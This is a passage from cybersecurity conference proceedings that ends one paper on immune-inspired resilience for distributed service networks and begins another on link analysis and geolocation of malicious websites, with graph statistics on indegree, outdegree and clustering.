local costs become less attractive than neighbor’s estimated costs then the workflow is forwarded to<br />
the node with the lowest estimated cost. Cost information is shared between nodes involved in a joint<br />
mission as part of workflow exchange messages.<br />
Attacks and failures may be detected indirectly, through their effects on the mission (see 3.1). To<br />
simplify our model, we currently consider the degradation of a task as causing direct impact in the<br />
mission performance. There are, however, related research efforts on mission mapping (Musman et<br />
al., 2010; Sorrel et al., 2008; Grimaila, 2008) that can provide a better assessment of the impact of<br />
localized failures to the overall mission.<br />
In general, the approach for detection may rely on a number of sources that include performance<br />
monitoring, anomaly detection, or resource utilization monitoring. These are all metrics that may be<br />
used to detect violations in resource utilization policies, or deviations from pre-defined (or learned, in<br />
the case of anomaly) QoS requirements for task execution.<br />
Dynamic resource management for mission continuity focuses on isolating the area (i.e. node, or<br />
services) associated with the damage to minimize the impact on mission execution. The re-allocation<br />
of resources and re-organization of tasks is coordinated through distributed, self-organizing<br />
algorithms and may take place at different scales – that is, from very localized modification involving a<br />
single service that has reported damage, to larger scale changes involving multiple services. An<br />
analog to this approach can be found in developmental biology, where cells (and other structures at<br />
different hierarchical levels) signal each other to induce a differentiation that will enable a needed<br />
capability. In our approach, mission-aware services will perceive the lack of damaged capability and<br />
will signal other services (as part of a distributed orchestration mechanism) to engage the new<br />
capabilities.<br />
3.3 Response and immunization<br />
The response and immunization mechanisms are responsible for both a short-term response to the<br />
reported damage and a longer-term mitigation strategy to future attacks of the same type. The<br />
intuitive response to a damaged component that can be replaced by alternative services in the<br />
environment is to immediately terminate the affected service. However, depending on the type of<br />
attack, the response and immunization layer may benefit from maintaining a potentially compromised<br />
node in operation. The goal is to identify the potential causes of the effects perceived as damage, and<br />
possibly correlate those events with the configuration of the node. This rudimentary approach to<br />
vulnerability estimation is useful in providing a hint to other services in the system that may be equally<br />
vulnerable to the same types of attacks. In our proposed infrastructure, the response and<br />
immunization mechanism work together to allow some time for the system to build such correlations<br />
before shutting down the node as a response to the damage. In order to do that without affecting the<br />
mission, a duplicate of workflows (which have been re-allocated to alternative nodes in response to<br />
the damage) is still sent to the damage node for processing, but it is also tagged to be ignored by<br />
subsequent processing services. This allows for the damaged component to remain ‘active’ for the<br />
characterization and immunization tasks.<br />
4. Preliminary experimental results<br />
A first proof of concept of the proposed approach was implemented and tested in a simulated<br />
networked environment using NS3. Simulated scenarios allow for larger scale experiments, and<br />
controlled attack conditions, facilitating the evaluation and analysis of the proposed algorithm. For the<br />
purposes of our first tests we considered a single service running on each node of our conceptual<br />
network, so the terms ‘service’ and ‘node’ are used interchangeably in our discussions. We also<br />
disregarded the complexities associated with service descriptions and interfaces. We focused, instead<br />
on the survivability and resilience aspects of the proposed approach. In our simulated scenario, each<br />
workflow is composed of 3 tasks, and a mission is composed of 400 workflows. There are 5 nodes (or<br />
services) executing independent parallel missions. In addition to those there are other 9 nodes<br />
available to be engaged for task execution, and 6 additional nodes playing the role of<br />
attackers.<br />
47
Marco Carvalho et al.<br />
Each node has a short sequence of bits (arbitrarily chosen to be a 4-bit string in our simulations) that<br />
represents its configuration. For example, the sequence 0000 could indicate a Linux-based host<br />
running the Apache Web Server of a given version, with other specific libraries and configurations. A<br />
different sequence of bits would represent an alternative configuration for the same service capability.<br />
The execution of each task in the workflow takes between 1 and 2 seconds under normal operational<br />
conditions. The simulation runs for 1200 seconds, and the attacking nodes become active only after<br />
200 seconds of simulation. At that point, each attacking node starts to launch attacks to a randomly<br />
selected victim every 6 seconds. Every task-processing node that receives an attack packet will<br />
match that attack against its own configuration (4-bit string). If at least a 75% match is found, the node<br />
accepts the attack and progressively degrades its performance.<br />
The scenario was executed with 20 different seeds and the results were averaged out across those<br />
runs. The metric of interest for comparing results is the percentage of completed workflows at any<br />
given moment of the simulation. Two baselines representing the upper and lower operational<br />
boundaries of the system were computed. The first baseline, identified in the chart as “Clean<br />
Baseline” (Figure 3), represents the performance of the system when there are no attacks during the<br />
whole simulation. The second baseline, identified in the chart as “Attack Baseline” (Figure 3),<br />
represents the performance of the system under attack but without any corrective measures. As<br />
previously discussed, an organic response to the degrading attacks should include both a recovery<br />
and adaptation component. The first strategy tested was a simple recovery strategy, consisting on<br />
restarting the compromised node to a previous safe image. This strategy was designed to simply<br />
mitigate the short-term effects of the problem. Figure 3 shows the performance of this strategy,<br />
identified as “Simple Reset” in the chart.<br />
Figure 3: Mission performance in different operation conditions<br />
A second strategy that was tested included in addition to a short-term response, an adaptation<br />
strategy to enhance the resilience of the system to subsequent attacks. The adaptation strategy can<br />
have multiple approaches. One approach can consist on randomizing the configuration of<br />
reinstantiated services and nodes. A second approach is to provide an immunization capability that<br />
will drive mutations of re-instantiated services to become resistant to previous attacks. In our<br />
experiments we have opted for the immunization strategy. The figure also shows the performance for<br />
this strategy, identified as “Immunization” in the chart.<br />
48
Marco Carvalho et al.<br />
Figure 4: Statistical significance of the performance gains due to the immunization strategy<br />
In the “Simple Reset” strategy, nodes detect and identify the attack and then reboot from a previously<br />
known safe state. The attack detecting happens indirectly (through the effects of the attack) and the<br />
identification happens by correlating the detection with the current state of the node. This process<br />
takes some time, during which the services of the node are degraded. In the “Immunization” strategy,<br />
the nodes additionally identify a “mutation” strategy that is likely to make it less vulnerable to the same<br />
attack. For our simulated scenario, the state of the node is represented by a 4-bit string and defines<br />
how vulnerable a node is to a given attack. The immunization process additionally involves<br />
announcing the 4-bit string to other nodes, which will drive “similar” nodes to mutate in order to<br />
become resistant to the attack. In the scenario illustrated in Figure 3, the “Immunization” starts with<br />
results close to the “Simple Reset” strategy, but then it improves getting close to the upper operational<br />
boundaries of the system (“Clean Baseline”). Figure Y shows how the p-value changes across time<br />
for a t-test of difference in percentage of completed missions for the “Immunization” and “Simple<br />
Reset” strategies. Approximately after 300 seconds in the simulation, the difference in performance<br />
between the “Immunization” and “Simple Reset” strategies becomes statistically significant. While<br />
very simplified at this point, our initial seems to indicate that an immunization-based strategy is more<br />
effective than a reactive approach based on simple node reset. Under the simplifying assumption that<br />
immunization has a fixed cost, fast recovery to continuous attacks will eventually be less effective<br />
than longer, but more permanent recovery to the same kinds of attacks.<br />
5. Conclusions<br />
In this paper we have described a three-layer concept for system resilience in distributed<br />
computational environments such as those found in cloud computing and service oriented<br />
architectures. Our proposal is based on the notions of self-organization and self-maintenance,<br />
leveraging distributed coordination algorithms for mission continuity. After a brief discussion on the<br />
capabilities enabled by cloud computing, service oriented architectures and some of their core<br />
services, we introduce our organic resilience approach. We define a threelayer defense infrastructure<br />
responsible for detecting damage (i.e. failures or attacks), maintaining mission execution, and<br />
identifying a short-term response and an immunization path for the problem. We also defined a very<br />
simplified scenario to illustrate the basic concepts of the proposed approach. In our simulations,<br />
services are equated to computational nodes in a distributed environment to simplify the simulations<br />
and allow for the use of network simulator as basis for test and evaluation. Our goal with these initial<br />
experiments was to illustrate the proposed concept, rather than making any quantitative claims. As<br />
part of our future work in this project we plan to more rigorously define the adaptation and<br />
diversification algorithms, and to better evaluate the agility, as well as the overhead and the<br />
effectiveness of the proposed approach.<br />
49
Acknowledgments<br />
Marco Carvalho et al.<br />
This material is partially based upon work supported by the Department of Energy National Energy<br />
Technology Laboratory under Award Number(s) DE-OE0000511.<br />
Disclaimer: Parts of this paper were prepared as an account of work sponsored by an agency of the<br />
United States Government. Neither the United States Government nor any agency thereof, nor any of<br />
their employees, makes any warranty, express or implied, or assumes any legal liability or<br />
responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or<br />
process disclosed, or represents that its use would not infringe privately owned rights. Reference<br />
herein to any specific commercial product, process, or service by trade name, trademark,<br />
manufacturer, or otherwise does not necessarily constitute or imply its endorsement,<br />
recommendation, or favoring by the United States Government or any agency thereof. The views and<br />
opinions of authors expressed herein do not necessarily state or reflect those of the United States<br />
Government or any agency thereof."<br />
References<br />
Abbes, T., Bouhoula, A., and Rusinowitch, M. (2004) “Protocol analysis in intrusion de- tection using decision<br />
tree,” in Information Technology: Coding and Computing, 2004. Proc. ITCC 2004. Intl. <strong>Conference</strong> on, vol.<br />
1.<br />
Benatallah, B., Hacid, M., Rey, C. and Toumani, F. (2003), “Semantic reasoning for web services discovery,” in<br />
Proc. of Workshop on E-Services and the Semantic Web at WWW 2003.<br />
Bradley, W. B., and Maher, D. P. (2004). The NEMO P2P Service Orchestration Framework. In Proceedings of<br />
the Proceedings of the 37th Annual Hawaii International <strong>Conference</strong> on System Sciences (HICSS'04) -<br />
Track 9 - Volume 9 (HICSS '04), Vol. 9. IEEE Computer Society, Washington, DC, USA, 90290.3-.<br />
Carvalho, M., Lamkin, T., Perez, C. (2010) Organic Resilience for Tactical Environments. 5 th International ICST<br />
Confernece on Bio-Inspired Models of Network, Information, and Computing Systems (Bionetics). Boston,<br />
MA, December, 2010.<br />
Carvalho, M. M., Pechoucek, M., and Suri, N. (2005) “A mobile agent-based middleware for opportunistic<br />
resource allocation and communications,” in DAMAS, pp. 121–134.<br />
Cho, S. and Park, H. (2003), “Efficient anomaly detection by modeling privilege flows using hidden Markov<br />
model,” Computers & Security, vol. 22, no. 1, pp. 45–55.<br />
Cohen, F. (1995), Protection and Security on the Information Superhighway, Wiley and Sons, 1995.<br />
Dasgupta, D. and Fabio Gonzalez, (2002), An immunity-based technique to characterize intrusions in computer<br />
networks, IEEE Trans. Evolutionary Comp. 6 (3), pp. 281–291, June 2002.<br />
Grimaila, M.R., “Improving the Cyber Incident Mission Impact Assessment Process,” Cyber Security and<br />
Information Intelligence Research Workshop (CSIIRW 2008), Oak Ridge National Laboratory, Oak Ridge,<br />
TN, May 12-14, 2008.<br />
Klusch, M., Fries, B., and Sycara, K. (2006) “Automated semantic web service discovery with OWLSMX,” in<br />
Proceedings of the fifth international joint conference on Autonomous agents and multiagent systems, pp.<br />
915–922, ACM.<br />
Lardieri, P., Balasubramanian, J., Schmidt, D. C., Thaker, G., Gokhale, A., and Damiano, T. (2007) “A multilayered<br />
resource management framework for dynamic re- source management in enterprise dre systems,”<br />
J. Syst. Softw., vol. 80, no. 7, pp. 984–996.<br />
Liang, Gang. (2006) An Immunity-Based Dynamic Multilayer Intrusion Detection System, Lecture Notes In<br />
Computer Science. Heidelberg: Springer Berlin 2006.<br />
Li, X., and Ye, N. (2001) “Decision tree classifiers for computer intrusion detection,” Jour- nal of Parallel and<br />
Distributed Computing Practices, vol. 4, no. 2, pp. 179–190.<br />
Lord, P., Alper, P., Wroe, C., and Goble, C. (2005) “Feta: A light-weight architecture for user oriented semantic<br />
service discovery,” The Semantic Web: Research and Applications, pp. 17–31.<br />
Microsoft (2010) “BizTalk Server”, http://www.microsoft.com/biztalk/en/us/host-integration.aspx<br />
Musman, S., Temin, A., Tanner, M., Fox, D. and Pridemore, B. (2010) “Evaluating the impact of cyber attacks on<br />
missions,” in 5th International <strong>Conference</strong> on Information Warfare and Security. Wright-<br />
OASIS, (2002) “UDDI Specifications.” http://www.oasis-open.org/committees/uddi-spec/doc/ tcspecs.htm.<br />
OASIS, (2009) “Web Services Dynamic Discovery (WS-Discovery).” Available online at: http://docs.oasisopen.org/ws-dd/discovery/1.1/wsdd-discovery-1.1-spec.html.<br />
Ourston, D., Matzner, S., Stump, W., and Hopkins, B. (2003) “Applications of hidden markov models to detecting<br />
multi-stage network attacks,” Proceedings of the 3<strong>6th</strong> Annual Hawaii International <strong>Conference</strong> on System<br />
Sciences, p. 10.<br />
Papazoglou, M., Traverso, P., Dustdar, S., and Leymann, F. (2008) “Service-oriented computing: A research<br />
roadmap,” Intl. Journal of Cooperative Information Systems, vol. 17, no. 2, pp. 223–255.<br />
Patterson AFB, Ohio, USA: Air Force Institute of Technology, April 8-9, pp. 446–456.<br />
Ranjan, R., Zhao, L., Wu, X., Liu, A., Quiroz, A., and Parashar, M. (2010) “Peer-to-Peer Cloud Provisioning:<br />
Service Discovery and Load-Balancing,” Cloud Computing, pp. 195–217.<br />
50
Marco Carvalho et al.<br />
Sorrels, D., Grimaila, M.R., Fortson, L.W., and Mills, R.F., (2008) “An Architecture for Cyber Incident Mission<br />
Impact Assessment (CIMIA),” Proceedings of the 2008 International <strong>Conference</strong> on<br />
Information Warfare and Security (ICIW 2008), Peter Kiewit Institute, University of Nebraska Omaha, 24-25 April<br />
2008.<br />
Tran, D. T., Hoang, N. H., and Choi, E. (2007) The WORKGLOW System in P2P-based Web Service<br />
Orchestration. In Proceedings of the 2007 International <strong>Conference</strong> on Convergence Information<br />
Technology (ICCIT '07). IEEE Computer Society, Washington, DC, USA, 2312-2317.<br />
DOI=10.1109/ICCIT.2007.377 http://dx.doi.org/10.1109/ICCIT.2007.377<br />
W3C (2007), “Semantic Annotations for WSDL (SAWSDL).” http://www.w3.org/2002/ws/sawsdl/.<br />
Yuan, S.; Chen, Q.; Li, P., (2009) Design of a four-layer IDS model based on immune danger theory,<br />
Proceedings of the 5th International <strong>Conference</strong> on Wireless Communications, Networking and Mobile<br />
Computing, WiCOM 2009<br />
Yasin, R. (2010) GCN, http://gcn.com/articles/2010/10/27/cia-hunt-cloud-computing.aspx<br />
51
Link Analysis and Link Visualization of Malicious Websites<br />
Manoj Cherukuri and Srinivas Mukkamala<br />
(ICASA)/CAaNES)/New Mexico Institute of Mining and Technology, USA<br />
manoj@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: In this paper we present web crawling, Meta searches, geo location tools, and computational intelligent<br />
techniques to assess the characteristics of a cyber-incident to determine if an incident is likely to be caused by a<br />
certain group, geographical location of the source, intent of the attack, and useful behavioral aspects of the<br />
attack. The malicious websites extracted from the identified sources acted as seeds for our crawler and were<br />
crawled up to two hops traversing through all the hyperlinks emerging out from these pages. After crawling, all<br />
the websites were translated to their geographic locations based on the location of the server on which the<br />
website is hosted using the Internet Protocol (IP) address to the geographical location mapping databases. We<br />
applied social networking analysis techniques to the link structure of the malicious websites to put forward the<br />
properties of the malicious websites and compared them with that of the legitimate websites. We identified the<br />
potential sources or websites that publish malicious websites using the meta-searches. Our approach revealed<br />
that the behavior of the malicious websites with respect to their indegrees, outdegrees and the clustering<br />
coefficient differ from that of the legitimate websites and some malicious websites acted as promoters for other<br />
malicious websites. The link visualization showed that the links traversing across the malicious websites are not<br />
confined to the region where the website was hosted.<br />
Keywords: link analysis, link visualization, malicious websites, social networking analysis techniques<br />
1. Introduction<br />
The increase in the number of internet users and bandwidth resulted in the proliferation of the<br />
websites. World Internet Usage and Population Statistics (2010) stated that, as of June 2010, there<br />
are about 2 billion internet users throughout the world with a growth rate of about 440% over a<br />
decade. December 2009 Web Server Survey (2009) affirmed that there are about 240 million<br />
websites hosted all over the world. The prospective growth rate of the internet users and their huge<br />
number created a new means of making revenue for the attackers, people who contribute to the<br />
malicious activities on the web. This huge market being exploited by the attackers is often referred to<br />
as the Underground Economy. Cheng (2008) listed that, as of 2008, the market for the underground<br />
economy was about US$276 million with a potential of billions of dollars. Luvender (2010) stated that,<br />
as of April 2010, United States alone is facing a loss of about $200 billion per year.<br />
A malicious website is a website which hosts malicious code to attack the client’s machine or spoofs<br />
the client by building up a look alike. The malicious script on the webpage is executed on loading the<br />
webpage and malicious script or file is installed without the users consent by exploiting the<br />
vulnerability of an application or by other possible means. The installed program reports the user<br />
sensitive data to the attacker. The underground economy has its own hierarchy of an organization<br />
with different sets of people (based on their roles) working collaboratively to exploit the potential of the<br />
underground economy. Important roles contributing to the hierarchy of the underground economies<br />
suggested by Zhuge et al. (2007) are Virus Writers, Website Masters, Envelope Stealers, Virtual<br />
Asset Stealers and Virtual Asset Sellers. Virus writers are responsible for writing up the malicious<br />
code. Website masters build up the websites and attract the traffic to their hosted websites using the<br />
approaches like search engine optimizations, blogging, spam etc. The terms website masters and<br />
traffic sellers are used interchangeably in this document. Envelope stealer purchases the malicious<br />
code and web traffic from the virus writers and website masters respectively. Envelope stealers<br />
capture the raw data from the victim’s machine and sell it out to the virtual asset stealers. Virtual asset<br />
stealers extract the useful information from the raw data purchased to convert it into a virtual asset.<br />
Virtual asset stealer sells the virtual assets to the Virtual asset sellers. Virtual asset sellers sell the<br />
virtual assets to the clients based on the type of the asset.<br />
Figure 1 obtained from Google Online Security blog shows an increase in number of malicious<br />
websites (Provos, 2010). The increase in the number of users of the internet had made the web a<br />
promising means for spreading the malware. The exponential growth of the websites on the World<br />
Wide Web has made the traditional crawling an infeasible option for detecting the malicious websites.<br />
The crawling mechanism must be associated with intelligence to get an optimal detection rate, often<br />
referred to as intelligent crawling. Previous works had shown that some of the hosting companies are<br />
52
Manoj Cherukuri and Srinivas Mukkamala<br />
acting as the safe medium for hosting the malicious websites (Kalafut, Shue and Gupta, 2010) and<br />
used code based and host based features for the detection of malicious websites dynamically (Ma et<br />
al., 2009; Cova, Kruegel and Vigna, 2010). In this paper we presented a few interesting heuristics of<br />
these malicious websites that help in enhancing the detection rate of the malicious websites.<br />
Figure 1: Growth of the number of entries on the Google Safe Browsing Malware List<br />
This paper is organized as follows: in section 2, we discuss the technical terms that help in<br />
understanding our results. In section 3, we discuss the processes involved in our study. In section 4,<br />
we describe our dataset. In section 5, we discuss about the analysis of the dataset. In section 6, we<br />
discuss about the link visualization. In section 7, we conclude with the results.<br />
2. Related technical terms<br />
2.1 Indegree<br />
Indegree of a node is defined as the number of edges pointing towards a node. For example, the<br />
indegree of node A in Figure 2 is 3 since there are three edges from nodes B, C, D pointing towards<br />
node A.<br />
Figure 2: Graph demonstrating node A with indegree 3<br />
53
2.2 Outdegree<br />
Manoj Cherukuri and Srinivas Mukkamala<br />
Outdegree of a node is defined as the number of edges pointing out from a node. For example, the<br />
outdegree of node A in Figure 3 is 3 since there are three edges emerging from A pointing towards<br />
nodes B, C, D.<br />
Figure 3: Graph demonstrating node A with outdegree 3<br />
2.3 Clustering coefficient<br />
Clustering coefficient is the measure of degree of closeness among the nodes of a graph (Clustering<br />
Coefficient, 2010). Chakrabarti and Faloutsos (2006) stated that the clustering coefficient represents<br />
the clumpiness of the graph. Clustering coefficient of a node is computed as the ratio of number of<br />
links among the linked nodes of a node to the number of possible links among the linked nodes of a<br />
node. The clustering coefficient of the nodes with 0 or 1 neighbors is 0.<br />
Clustering coefficient of all the nodes are computed and averaged to get the clustering coefficient of<br />
the network. For example, consider the graph shown in the Figure 4.<br />
Node A has three neighbors namely, B, C and D. BC is the only link among the neighbors of A.<br />
Number of possible links among the neighbors of A are 3 (i.e. 3 C2). Therefore, the clustering<br />
coefficient of A is 0.33.<br />
Node B has two neighbors and there is one link among the neighbors of B. Therefore, the<br />
clustering coefficient of B is 1.<br />
Node C has two neighbors and there is one link among the neighbors of C. Therefore, the<br />
clustering coefficient of C is 1.<br />
Node D has two neighbors and there is no link among the neighbors of D. Therefore, the<br />
clustering coefficient of D is 0.<br />
Node E has one neighbor and there is one link among the neighbors of E. Therefore, the<br />
clustering coefficient of E is 0.<br />
Figure 4: Graph used for explaining clustering coefficient<br />
The clustering coefficient of a graph is computed using the following formula,<br />
54
Manoj Cherukuri and Srinivas Mukkamala<br />
<br />
1<br />
where ‘C’ represents the clustering coefficient of the graph, Ci represents the clustering coefficient of<br />
the node ‘i’ and ‘n’ is the total number of nodes in the graph (Clustering Coefficient, 2010). The<br />
clustering coefficient of the graph in the figure above is 0.466 (i.e.1/5(0.33+1+1+0+0).<br />
3. Processes<br />
Construction of our dataset is composed of three processes.<br />
The first process deals with the collection of malicious websites from multiple sources<br />
The second process deals with the construction of link structure for the malicious domains<br />
obtained in the previous process<br />
The third process deals with computing the geographical location of the websites based on the IP<br />
address to geographical location mapping<br />
3.1 Collection of malicious websites<br />
The process of collecting the malicious websites is initialized by identifying the potential sources using<br />
the meta-search engines. These sources publish the websites with different sets of associated<br />
attributes. Some of the attributes associated with these domains are date, type of attack, executable<br />
name and IP address. A custom parser was used for each website source to retrieve the domain<br />
name and the IP address if available. All the malicious websites collected from these sources are<br />
stored in the database.<br />
3.2 Construction of link structure for malicious websites<br />
Crawling is performed on the malicious websites obtained from the previous process using a custom<br />
program. The malicious websites are crawled till the second hop. The flowchart for the process of<br />
building the link structure is shown in the figure 6. All the malicious domains retrieved from various<br />
sources are loaded which act as the seeds for the crawling process and ‘n’ is the total number of<br />
malicious websites. A custom crawler was built to retrieve the content of the malicious websites and<br />
parse all the anchor tags from the content. The parsing of the anchor tags from the website content is<br />
done using the BeautifulSoup (Beautiful Soup, 2010), widely used html parser. All the links originating<br />
from respective malicious websites are stored in the database. The domain is parsed from each such<br />
link and is stored in the tuple corresponding to that link. If the link URL is not listed in the malicious<br />
websites then it is added to a list called as LinkWebsites to avoid duplicate URLs. Once all the<br />
malicious domains are crawled and their corresponding links are stored, the LinkWebsites list is<br />
loaded into MaliciousWebsites list to crawl all the new websites obtained in the first hop from the<br />
malicious websites. Again the process of crawling, parsing anchor tags and storing the links is<br />
performed. Thus, all the links within the first two hops emerging from the malicious websites are<br />
obtained.<br />
3.3 Computing geographical location of websites<br />
The location of the server on which the website is hosted was determined using the IP address to<br />
geographic location mapping. All the distinct domains that are stored during the link analysis phase<br />
are translated to their corresponding IP addresses using the Domain Name Servers (DNS). A custom<br />
script is used to perform the domain name to IP address translation using the ‘nslookup’ command.<br />
The IP address to location mapping is done using the open source database. All the IP addresses for<br />
which the location is not identified are mapped to latitude and longitude values 0 and 0 respectively.<br />
4. Dataset<br />
For our experiments, all the potential sources for the malicious websites were identified using the<br />
meta-search engines. Such identified sources used for the study were PhishTank, Malware Domain<br />
Blocklist, abuse.ch, MalwarePatrol, joewein.de LLC. and Malware Domain List.<br />
55
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 5: Flowchart for the process of malicious websites collection.<br />
All the malicious websites listed in these sources were collected and stored in the database. Crawling<br />
was performed on the collected malicious websites up to the third hop as described in the section 4.2<br />
to build the link structure for all the malicious websites.<br />
Finally, the domains obtained during the first two processes of the data collection were translated to<br />
their geographical location using the process described in the section 4.3. To perform a comparative<br />
analysis of the malicious websites against the legitimate websites, the top 1500 webistes were<br />
downloaded from Alexa (Top Sites, 2010), a source for top websites and were crawled upto the<br />
second hop. This domain is reffered as a set of legitimate or non-malicious websites in the remaining<br />
part of this paper.<br />
Around 350,000 distinct malicious websites were collected from the previously mentioned sources.<br />
Since these domains were detected and flagged as malicious, major portion of them were down at the<br />
time of the analysis. Only about 20,000 distinct URLs were alive at the time of our analysis. About<br />
only 5.7% of the malicious websites collected were alive for our analysis. Link analysis was performed<br />
on about 19,000 malicious websites of the 20,000 live malicious websites. Remaining websites did<br />
not have any text to perform link analysis as they were pointing out to files like executables, jars,<br />
binaries etc.<br />
Around 600,000 Uniform Resource Locators (URLs) were crawled during the collection of our dataset.<br />
The URLs were crawled at the rate 50 URLs per minute. Of the live malicious websites, 14,970<br />
domains were hosted in United States. The top five countries contributed 83% of the total malicious<br />
websites of our dataset.<br />
56
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 6: Process of construction of link structure up to two hops originating from malicious websites<br />
57
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 7: Overview of the process for the construction of the dataset<br />
Table 1: Top five countries by the number of malicious websites hosted in our dataset<br />
5. Link analysis<br />
Country Number of malicious websites<br />
United States 14790<br />
Philippines 1086<br />
Canada 432<br />
Germany 183<br />
United Kingdom 143<br />
5.1 Outdegree and indegree of malicious websites<br />
The indegree and the outdegree of the malicious websites within the dataset were computed and<br />
plotted two graphs representing the count of the malicious domains versus the indegree and the<br />
outdegree. For computing the indegree and the outdegree of the websites, we considered only the<br />
links among different domains as most of the links within the same domain were identified to be<br />
navigational links. The count versus the indegree and the outdegree graphs are shown in Figure 8.<br />
The outdegree and the indegree of the malicious websites did not satisfy the power law in contrast to<br />
the World Wide Web graph (Watts and Strogatz, 1998).<br />
In an attempt to identify an equation that suites the indegrees and oudegrees of malicious websites,<br />
we identified that the malicious websites satisfy the power law with an exponential cutoff. The Lambda<br />
and the Gamma values of the power law with exponential cutoff equation for the indegree and the<br />
outdegree of malicious websites were identified to be 12.32, 0.9 and 8.32, 1.02 respectively.<br />
Correlation coefficient was measured to verify the fit of these equations. The correlation coefficient<br />
was 0.98 and 0.99 for the indegree and the outdegree respectively signifying a good fit.<br />
<br />
.<br />
<br />
<br />
Where <br />
<br />
is the exponential cutoff and is the power law term (Clustering Coefficient, 2010)<br />
58
Manoj Cherukuri and Srinivas Mukkamala<br />
<br />
<br />
<br />
<br />
. . .<br />
<br />
<br />
. . .<br />
Figure 8: Count of malicious websites versus indegree (left) and outdegree on the log-log scale (right)<br />
The average indegree of the malicious websites was 4.1 and the average outdegree of the malicious<br />
websites was 3.9. The standard deviation of the indegree and the outdegree of the malicious<br />
websites was 9.3 and 6.04 respectively. The average indegree was greater than the average<br />
outdegree of the malicious websites, even though the indegree computation is limited to the crawled<br />
dataset. This indicates that the malicious websites tend to have higher indegree over their outdegree.<br />
Series1 represents count versus indegree and count versus outdegree in the left and the right graphs<br />
respectively. The outdegree of the malicious websites was compared to the outdegree of the<br />
legitimate websites. We avoided the indegree in this study as the indegrees are limited to the links<br />
existing within the dataset. graph plotted with the outdegrees of the malicious and the legitimate<br />
websites is shown in Figure 9.<br />
59
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 9: Count of malicious websites versus outdegree on the log-log scale for the malicious and the<br />
non-malicious websites<br />
The average outdegree of the malicious websites was 3.9 with a standard deviation of 6.04. The<br />
average outdegree of the non-malicious websites was 39.17 with a standard deviation of 30.64. The<br />
standard deviation of the non-malicious websites was very high compared to the malicious websites.<br />
The standard deviation of the outdegree of the malicious websites and the non-malicious websites<br />
about the mean signify that the major portion of the non-malicious websites have an outdegree<br />
greater than 10 and the major portion of the malicious websites have an outdegree less than10. The<br />
spike in the series of malicious websites at the outdegree of 89 was due to a cluster of websites<br />
(about 35 websites) which had links to each other randomly.<br />
5.2 Malicious websites linked through a non-malicious website<br />
For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />
edges. All the distinct domains obtained during the construction of the link structure were considered<br />
as the vertices of graph G. Based on the links obtained during the construction of link structure, the<br />
vertices were connected with directional edges.<br />
All the malicious websites that were part of the link structure were loaded into set S. In order to<br />
identify the non-malicious websites facilitating malicious websites, all the vertices which were not in S<br />
and had a minimum of one edge pointing towards them from a vertex in S and minimum of one edge<br />
emerging from them towards another vertex in S were selected.<br />
In our study of link analysis, it was observed that around 5000 malicious websites were linked through<br />
950 non-malicious websites. In this analysis, we tried to identify the domains which were not malicious<br />
but had links to malicious websites.<br />
In order to make the study effective, some of these non-malicious domains were visited manually to<br />
get a better knowledge about how the links to malicious domains were being placed in the nonmalicious<br />
domains. The main reason for this sort of linking was that the traffic sellers have built up<br />
websites with high pagerank that drives traffic towards the malicious websites which are short lived<br />
and according to Stevens (2010), the traffic sellers are paid based on the number of clicks or number<br />
of victims.<br />
As most of the traffic towards the non-popular domains is obtained through search engines, the traffic<br />
sellers are using these non-malicious domains as the means of driving towards the newly built<br />
malicious websites. The distribution of the outdegrees of the facilitating websites is shown in Figure<br />
10. Figures 11, 12 and 13 show screenshots of websites promoting malicious websites in different<br />
ways.<br />
60
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 10: Number of facilitating websites against their respective outdegrees on the log-log scale<br />
The mean of the facilitating websites was identified to be 50.12 with a standard deviation of 30.13.<br />
The mean outdegree of the facilitating websites is high compared to the mean outdegree of the<br />
malicious and the legitimate websites. The facilitating websites are having high outdegree mimicking<br />
the behavior of the legitimate websites in contrast to that of the malicious websites.<br />
Figure 11: Figure shows a screenshot of beautfulwallpapers.com<br />
The website in Figure 11 is non-malicious but has links to other malicious websites on the top left<br />
corner (marked in box) deceiving the users as all of them belong to the same website.<br />
Figure 12: Figure shows a screenshot of bizar.com<br />
The website in Figure 12 is non-malicious but promotes links to malicious websites with relevant<br />
content at the bottom of the page (marked in box).<br />
61
Manoj Cherukuri and Srinivas Mukkamala<br />
This website in Figure 13 is not malicious but has links to other malicious websites on the right column<br />
(marked in box) with the heading as “TRY MORE”. Similarity among the products on the right column<br />
with the product of the main website draws the user’s attention towards them.<br />
5.3 Malicious websites linked to other malicious websites<br />
For this analysis, a graph G (V, E) was constructed, where V is the set of vertices and E is the set of<br />
edges. All the malicious websites that participated in the construction of the link structure were<br />
considered as the vertices of graph G. Based on the links obtained during the construction of the link<br />
structure, the vertices were connected with directional edges. In order to identify the malicious<br />
websites linked to other malicious websites, all the vertices which had links to another vertex were<br />
selected.<br />
Figure 13: Figure shows the screenshot of cddvdcopy.net<br />
In our study of link analysis, it was observed that around 1000 malicious websites were linked directly<br />
to another malicious website. Manual analysis was done on these sites to have a better knowledge<br />
about the linking mechanism. The reason for having such links might be that many malicious domains<br />
are under the control of a single envelope stealer trying to host multiple types of attacks on different<br />
domains. In such a case the envelope stealers would prefer to have links among the malicious<br />
domains under their control. The domains encountered under this category were less compared to the<br />
previous category. The main reason might be the restriction for the traffic sellers from the envelope<br />
stealers as the victims become common among the different envelope stealers. However, to come to<br />
a conclusion on this point, a detailed analysis on the coding style and the type of attack used needs to<br />
be figured out which is out of scope for this study. Figures 14, 15 and 16 show screenshots of the<br />
examples of malicious websites under this category.<br />
62
Manoj Cherukuri and Srinivas Mukkamala<br />
Figure 14: Screenshot of the website legalizationofmarijuana.com<br />
Figure 15: Screenshot of the website howtogrowmarijuanablog.com<br />
The Figures 14, 15 and 16 are screenshots of malicious websites linking to other malicious websites.<br />
All these three sites are malicious and have links to each other under the section links on the left<br />
column of the page (marked in box).<br />
5.4 Clustering coefficient of malicious websites<br />
Clustering coefficient was computed among the malicious websites to identify the closeness among<br />
the malicious websites and compared it with the clustering coefficient of the legitimate websites to<br />
understand the differences in the linking mechanism. The clustering coefficient of the malicious<br />
websites was identified to be 0.18 and a significant portion of this value is contributed by the<br />
facilitating websites. On the other side, the clustering coefficient of the legitimate websites was<br />
